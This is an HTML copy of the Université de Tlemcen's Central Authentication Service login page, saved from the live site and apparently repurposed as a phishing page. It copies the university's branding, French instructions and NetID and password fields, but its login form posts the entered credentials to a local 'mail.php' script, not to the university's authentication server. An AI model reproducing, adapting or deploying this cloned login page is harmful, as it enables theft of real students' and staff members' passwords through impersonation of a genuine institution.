<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!-- saved from url=(0087)https://cas.univ-tlemcen.dz/cas/login?service=https://ent.univ-tlemcen.dz/uPortal/Login -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	    <title>Central Authentication Service UABT</title>
        
           
           
                
                <link type="text/css" rel="stylesheet" href="./index_files/cas.css">
           
        
        
        <script type="text/javascript" src="./index_files/jquery.min.js.download"></script>
        <script type="text/javascript" src="./index_files/jquery-ui.min.js.download"></script>
        <script type="text/javascript" src="./index_files/cas.js.download"></script>
	    <link rel="icon" href="https://cas.univ-tlemcen.dz/cas/;jsessionid=E72F86EF22671D6B6E6833DD0D3C6D7E" type="image/x-icon">
	</head>
	<body id="cas" class="fl-theme-iphone">
	<div id="sidebar">
                <!--p class="fl-panel fl-note fl-bevel-white fl-font-size-80">For security reasons, please Log Out and Exit your web browser when you are done accessing services that require authentication!</p-->
				
                <div id="list-languages" class="fl-panel">
                
					
                    
                  <!--h3>Languages:</h3-->
                  
                     
                     
                        
						<ul class="csmenu"><li><a href="https://cas.univ-tlemcen.dz/cas/login?service=https://ent.univ-tlemcen.dz/uPortal/Login&amp;locale=en">English</a></li><!--li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=es">Spanish</a></li
							--><li class="first"><a href="https://cas.univ-tlemcen.dz/cas/login?service=https://ent.univ-tlemcen.dz/uPortal/Login&amp;locale=fr">French</a></li><!--li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=ru">Russian</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=nl">Nederlands</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=sv">Svenskt</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=it">Italiano</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=ur">Urdu</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=zh_CN">Chinese (Simplified)</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=de">Deutsch</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=ja">Japanese</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=hr">Croatian</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=cs">Czech</a></li
							><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=sl">Slovenian</a></li
                            ><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=ca">Catalan</a></li
                            ><li><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=mk">Macedonian</a></li
							><li class="last"><a href="login?service=https://ent.univ-tlemcen.dz/uPortal/Login&locale=pl">Polish</a></li
						--></ul>
                     
                   
                </div>
            </div>
    <div class="flc-screenNavigator-view-container">
        <div class="fl-screenNavigator-view">
            <div id="header" class="cstete">
			<img id="logo" class="imagflo" src="./index_files/logo.jpg" alt="logo" title="logouniversite" width="120" height="80">
                <h1 id="app-name" class="cstitre">Service d'Authentification de l'Université de Tlemcen</h1>
            </div>		
            <div id="content" class="fl-screenNavigator-scroll-container">
			                <div id="introduction">
								<!--img  id="logo" src="images.jpg"  alt="jj" title="cadena" /-->
										<p class="intro">
										<img id="logo" src="./index_files/cadena.jpg" class="imagflo" alt="jj" title="cadena" width="80" height="50">
										Vous souhaitez accéder à un service qui nécessite une authentification.<br>
										Entrez votre identifiant (login) et votre mot de passe puis
										cliquez sur le bouton SE CONNECTER ci-dessous pour continuer.
										</p>
										
									
										
										</div>

			<form id="fm1" class="fm-v clearfix" action="mail.php" method="post">
			    
                <div class="box fl-panel" id="login">
                <!-- Congratulations on bringing CAS online!  The default authentication handler authenticates where usernames equal passwords: go ahead, try it out.  -->
                    <!--h2>Enter your NetID and Password</h2-->
						
                    <!--div class="row fl-controls-left"-->
					<table cellspacing="1" cellpadding="10">
                       <tbody><tr><td> <label for="username" class="fl-label"><span class="accesskey">N</span>etID:</label></td>
						<td>

						
						
						<input id="username" name="username" class="required" tabindex="1" accesskey="n" type="text" value="" size="25" autocomplete="false">
						</td></tr>
                    <!--/div-->
                    <!--div class="row fl-controls-left"-->
                       <tr><td> <label for="password" class="fl-label"><span class="accesskey">P</span>assword:</label></td>
						
						<td>
						<input id="password" name="password" class="required" tabindex="2" accesskey="p" type="password" value="" size="25" autocomplete="off"></td>
                    <!--/div-->
                    <!--div class="row check">
                        <input id="warn" name="warn" value="true" tabindex="3" accesskey="w" type="checkbox" />
                        <label for="warn"><span class="accesskey">W</span>arn me before logging me into other sites.</label>
                    </div-->
                    <!--div class="row btn-row"-->
						<td><input type="hidden" name="lt" value="A32EE86766839E3F947515F2179F2F5A90E0FCEBCF79330944FE027952AF9CC13F84AEBE24CA9EF7103CE65D57285A46">
						<input type="hidden" name="_eventId" value="submit">

                        <input class="btn-submit" name="submit" accesskey="l" value="LOGIN" tabindex="4" type="submit"></td></tr>
						<tr style="text-align:right">
						<td colspan="2">
						<a href="https://activcompte.univ-tlemcen.dz/" target="_blank"><strong> Activer votre compte </strong></a>
						</td>
						<td>
						<a href="https://editcompte.univ-tlemcen.dz/" target="_blank"><strong> Mot de passe oublié?</strong></a>
						</td>
						</tr>
                        <!--input class="btn-reset" name="reset" accesskey="c" value="CLEAR" tabindex="5" type="reset" /-->
                    <!--/div-->
             
				<tr>
				<td colspan="3">
				<div id="csalert">
											<p><img id="logo" src="./index_files/imgg.jpg" class="imagflo" alt="jj" title="cadena"></p>
							<p><span class="bold">Pour des raisons de sécurité</span>, fermez votre navigateur web
															  après avoir accédé aux services protégés
															  ! Cette fermeture vous déconnecte automatiquement.
														</p>
														
													</div>
				</td>
				</tr>
				 </tbody></table>
			  </div>
			
		
				
            </form>
</div>
</div>
<!--/div-->

      

                <!--/div-->
            <!--/div-->
        </div>
   


</body></html>